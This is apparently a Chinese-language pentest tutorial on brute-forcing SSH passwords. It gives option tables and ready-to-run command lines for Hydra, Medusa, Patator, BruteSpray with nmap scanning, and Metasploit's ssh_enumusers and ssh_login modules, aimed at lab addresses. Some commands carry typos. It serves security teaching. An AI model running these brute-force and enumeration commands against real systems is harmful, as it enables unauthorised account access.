SSH暴力破解实战
一.hydra【海德拉】
海德拉(Hydra):希臘神話中的九頭蛇,是西方的神話生物,在古希臘神話中出現最為頻繁。傳說它擁有九顆頭,其中一顆頭要是被斬斷,立刻又會生出兩顆頭來。
Hydra是世界頂級密碼暴力破解工具,支持幾乎所有協議的在線密碼破解,功能強大,其密碼能否被破解關鍵取決于破解字典是否足夠強大,在網絡安全滲透過程中是一款必備的測試工具。
1.指定用戶破解:
hydea -l user -P passlist.txt ftp://192.168.0.1 hydra -L userlist.txt -p defaultpw imap://192.1680.0/PLAIN hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5 hydra -l admin -p password ftp://[192.168.0.0/24]/ hydra -L logins.txt -p pws.txt -M targets.txt ssh hydra -l root -P pass.list 192.168.75.158 ssh2.用戶列表破解:
hydra -L userlist.txt -P passlist.txt 192.168.75.158 ssh hydra -L userlist.txt -P passlist.txt -M hostlist.txt ssh hydra -l root -P pass.list 192.168.75.158 ssh -o hydrassh.txt二.medusa[美杜莎]
美杜莎是希臘神話里的一個女妖怪,她的頭發是毒蛇,長的青面獠牙,她知道自丑,她要報復,她把見過她的人都變成了石頭。據說她原是一位美麗的少女,之所以變成蛇發女妖是因為梅杜莎和智慧女神雅典娜比美,雅典娜一怒之下將梅杜莎的頭發變成毒蛇,變成面目丑陋的怪物。
Medusa[美杜莎]是一個速度快,支持大規模并行,模塊化,爆破登錄。可以同時對多個主機、用戶或密碼執行強力測試。Medusa和Hydra一樣,同樣于在線密碼破解工具。不同的是,Medusa的穩定性相較于Hydra要好很多,但其支持模塊要比Hydra少一些。
Medusa [ -h host | -H file] [ -u username | -U file] [-p password | -p file ] [ -C file ]
| 選項 | 功能說明 |
| -h [TEXT] | 目標主機名稱或者IP地址 |
| -H [FILE] | 包含目標主機名稱或者IP地址文件 |
| -u [TEXT] | 測試的用戶名 |
| -U [FILE] | 包含測試的用戶名文件 |
| -p [TEXT] | 測試的密碼 |
| -P [FILE] | 包含測試的密碼文件 |
| -C [FILE] | 組合條目文件 |
| -O [FILE] | 日志信息文件 |
| -e [n/s/ns] | n代表空密碼,s代表為密碼與用戶名相同 |
| -M [TEXT] | 模塊執行名稱 |
| -m [TEXT] | 傳遞參數到模塊 |
| -d | 顯示所有的模塊名稱 |
| -n [NUM] | 使用非默認Tcp端口 |
| -s | 啟用SSl |
| -r [NUM] | 重試間隔時間,默認未3秒 |
| -t [NUM] | 設定線程數量 |
| -T | 同時測試的主機總數 |
| -L | 并行化,每個用戶使用一個線程 |
| -f | 在任何主機上找到第一個賬號/密碼后,停止破解 |
| -F | 在任何主機上找到第一個有效的用戶名/密碼后停止審計 |
| -q | 顯示模塊的使用信息 |
| -v [NUM] | 詳細級別(0-6) |
| -w [NUM] | 錯誤調試級別(0-10) |
| -V | 顯示版本 |
| -Z [TEXT] | 繼續掃描上一次 |
medusa -M ssh -u root -P pass.list -h 192.168.75.158
medusa -M ssh -H hostlist.txt -U userlist.txt -P passlist.txt
medusa -M ssh -u root -P pass.list -h 192.168.75.158 -O medusa.txt
三.Patator強大的命令行暴力破解器
查看模塊: #patator
查看模塊具體用法:#patator --ssh_login --help
#patator ssh_login host=192.168.75.158 user=root password=FILE0 0=passlist.txt
#patator ssh_login host=192.168.75.158 user=FILE0 0=user.list password=FILE1 1=pass.list
#patator ssh_login host=192.168.75.158 user=FILE0 0=user.list password=FILE1 1=pass.list -x ignore:mesg=‘Authentication failed.’
四.BrutesPray
BrutesPray是一款基于nmap掃描輸出的gnmap/XML文件。自動調用Medusa對服務進行爆破。
1.安裝brutespray
#apt-get update
#apt-get install brutespray
2.語法參數:
| 選項 | 功能說明 |
| -f或 --flie | 接一個文件名, 解析nmap輸出的 GNMAP 或者 XML 文件 |
| -s或 --service | 接一個服務名, 指定要攻擊的服務 |
| -t 或 --threads | 接一數值,指定線程數 |
| -T 或 --hosts | 接一數值,指定同時測試的主機數 |
| -U 或 --userlist | 接一個用戶字典文件 |
| -P 或 --passlist | 接一個密碼字典文件 |
| -u 或 --username | 接用戶名,指定一個用戶名進行爆破 |
| -p 或 --password | 接一個密碼,指定一個密碼進行爆破 |
| -c 或 --continuous | 成功之后繼續爆破 |
| -I 或 --interactive | 交互模式 |
3.Nmap掃描常用命令
| 命令 | 功能說明 |
| nmap -ip地址 | |
| nmap -v ip地址 | 顯示掃描過程 |
| nmap -p80,8080 | 指定端口掃描 |
| nmap -A ip | 綜合掃描 |
| nmap -O ip | 掃描主機操作系統 |
| nmap -iL 文件 | 掃描指定文件中的IP |
| nmap -sS SYN掃描 | 使用SYN半開放掃描 |
| nmap -sT TCP掃描 | 掃描開放了TCP端口的設備 |
| nmap -F | 快速掃描 |
| nmap -sV | 版本檢測 用于掃描目標主機服務版本號. 探測打開的端口以確定服務/版本信息 |
| nmap -sR | RPC掃描 |
| nmap -sU | 探測那些UDP端口開放 |
| nmap -sO | 用于判斷目標主機上使用的是神魔協議 探測目標主機支持哪些IP協議 |
| nmap -oX | 表示以xml的格式輸出結果到以文件 |
| -P0 | 跳過ping的探測,可以加快掃描速度. |
| -sP | ping掃描 |
| -T [0-6] | 設置定時模板(越高越快) |
4.對SSH密碼進行爆破
#nmap -sV -p 22 192.168.75.0/24 -oX nmaplive.xml #brutespray --file nmaplive.xml -u root -P pass.list -c #cat /root/brutespray-output/22-ssh-success.txt 查看爆破成功的文件內容五.Metasploit Framework
Metasploit Framework(簡稱MSF)是一個編寫、測試和使用exploit代碼的完善環境。這個環境為滲透測試,Shellcode編寫和漏洞研究提供了一個可靠的平臺,這個框架主要是由面向對象的Perl編程語言編寫的,并帶有由C語言,匯編程序和Python編寫的可選組件。
#msfconsole
msf > search ssh
1.MSF枚舉(找用戶)
msf > use auxiliary/scanner/ssh/ssh_enumusers msf auxiliary(scanner/ssh/ssh_enumusers) > show options msf auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 192.168.75.158 設置目標主機 msf auxiliary(scanner/ssh/ssh_enumusers) > set user_file /root/user.list msf auxiliary(scanner/ssh/ssh_enumusers) > set threads 10 msf auxiliary(scanner/ssh/ssh_enumusers) > show options msf auxiliary(scanner/ssh/ssh_enumusers) > run2.MSF版本探測
msf > use auxiliary/scanner/ssh/ssh_version msf auxiliary(scanner/ssh/ssh_version) > show options msf auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.75.158 msf auxiliary(scanner/ssh/ssh_version) > show options msf auxiliary(scanner/ssh/ssh_version) > run3.MSF暴力破解
msf auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ssh/ssh_login msf auxiliary(scanner/ssh/ssh_login) > show options msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.75.158 msf auxiliary(scanner/ssh/ssh_login) > set pass_file /root/pass.list msf auxiliary(scanner/ssh/ssh_login) > set user_file /root/user.list msf auxiliary(scanner/ssh/ssh_login) > run總結
- 上一篇: DVWA通关教程(下)
- 下一篇: Kali利用msf对MS10_061漏洞